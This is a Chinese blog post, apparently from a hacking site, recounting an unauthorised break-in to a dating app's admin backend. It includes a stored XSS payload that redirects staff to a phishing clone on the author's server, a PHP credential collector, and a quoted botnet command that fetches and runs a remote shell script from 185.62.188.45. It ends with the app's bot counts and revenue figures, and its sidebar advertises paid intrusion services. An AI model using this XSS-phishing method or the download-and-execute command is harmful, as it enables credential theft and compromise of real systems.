前言
无聊寂寞(这不是重点),去应用市场上下载了某个同城约x软件,点开软件,首先不需要登录/注册就可以进来。。就感觉发现有问题了。

主界面是长这样的,类似探探一样可以选择心动或者忽略,忽略之后就会蹦出下一个女生的照片:

瞎划几下,就有一堆女的找我聊天,直觉告诉我这肯定是机器人:

注入点
在设置中心 -> 反馈建议处插入 xss payload:

接收 cookie 信息
很快就可以接收到一些 cookie 信息,但是点开之后发现少了 JSESSIONID,无法直接登录到后台:

访问一下页面:

弱口令尝试了登录不了。。爆破也没有结果,也不存在注入点。
遇到这种情况一种是两种思路:绕过 http-only 或者构造钓鱼网站,让受害者去输入账号和密码。这里我选择了后者。
构造钓鱼页面
首先构造一个和登录界面一样的页面,将源码的 js、css 下载放在本地即可。

将登录处的代码的 action 改成当前目录下的 get_data.php 文件用来接收账号和密码:

get_data.php:

接着只要构造 xss payload:
<script>window.location.href="http://xxxxxx:8080/login.html"</script>
(xxxxxx 是我自己的 vps 服务器)
- 使用 php 开一个 web 服务即可:
- php -S 0.0.0.0:8080 -t ./
最后的效果是这样的,报一个登录超时,让受害者重新输入密码,注入完了密码之后,重新跳转回原来正常的登录页面:

等待输入
将 xss payload 插入反馈的页面,之后等待输入即可。

客服早上 10 点才上班,我大概 9 点多的时候开启了服务,这里比较好玩的是我还抓到了别的东西:

一个美国的 ip 访问了我的服务,是一个比较奇怪的链接,仔细一看这个就是抓肉鸡的链接:
shell?cd+/tmp;wget+http://185.62.188.45/jaws.sh+-O+-+>.ske.sh;chmod+777+.ske.sh;sh+.ske.sh
搜索了一下 jaws ,这个是摄像头的一个牌子, 在 1.0 版本下的 /shell
路径存在一个命令执行漏洞,很显然这个就是批量抓肉鸡了。C2C 服务器是 185.62.188.45。
上钩
我就等啊等,到 9.58 的时候,发现那边已经访问了我的链接,应该是客服准时上班了,但是他过了几分钟也没有点击登录进来,一直在登录界面观望(没有访问 get_data.php 说明他没有输入密码),我就觉得他应该是起了疑心了吧。。。

正在我准备放弃的时候,我发现有另外一个 IP 访问了我的服务器,而且还输入了密码(怀疑这里是他发现登录不上的时候询问了管理员,管理员一顿操作直接看也不看就登录上)!!赶紧看看日志:

激动的发现就是 admin 账号!

登录后台
拿到账号密码赶紧登录一波,看了一下果然是最高管理员的权限,并且菜单的功能还挺多的:

先习惯性看一下用户反馈,果然不出所料,肯定是一堆机器人。。。这不坑骗广大男同胞吗?

下面的一些截图也可以证明:
查询机器人的数量 11089:

正常女性用户这里是 115 名,而且不包括男性朋友选择了女性角色的情况,所以这里至少 90% 是机器人,毋庸置疑了:

另外还有一些让人惊讶的地方:
这是从 25 号凌晨开始到 10 点多的订单总额,50w!!!

查了一下昨天 24 号的,200多w!我的天,这流水量超过了我的预期,这骗子软件有这么多人充钱,这些男性都如此饥渴嘛。。傻傻分不清是不是机器人还是真人。。
一周的充值金额数,8 位数!!这他妈比做黑产还赚钱。。

这是 AI 自动回复的消息:

想感叹一句,这
- 上一篇:实战bc站 收割菠菜天恒盛达
- 下一篇:实战审计某BC站源码,并拿下权限
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 最新文章
- 随机文章
-
- 2017带着梦想重新起航!
- MYSQL提权总结
- Kali Linux渗透基础知识整理(一):信息搜集
- emlog后台拿shell方法合集
- Win7文件搜索神器:Everything v1.3.4正式版下载
- PHP
- 撸翻希拉里的胖子黑客成长史
- Python入门学习
- Arpy – Mac OSX ARP嗅探工具
- wooyun知识库文章及整站镜像分享
- 多线程WEB安全日志分析脚本
- 网站后台登陆万能密码
- 解析漏洞
- 实战审计某BC站源码,并拿下权限
- PHP序列化和反序列化语法差异问题
- Linux应急响应(一):SSH暴力破解
- 分享一款基于Pocsuite的漏洞扫描系统
- 盘古团队发布iOS 9.2-9.3.3越狱工具
- 编辑器漏洞手册
- Dmitry:深度信息挖掘工具
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
- 利用Thinkphp 5缓存漏洞实现前台Getshell
- 文章标签
-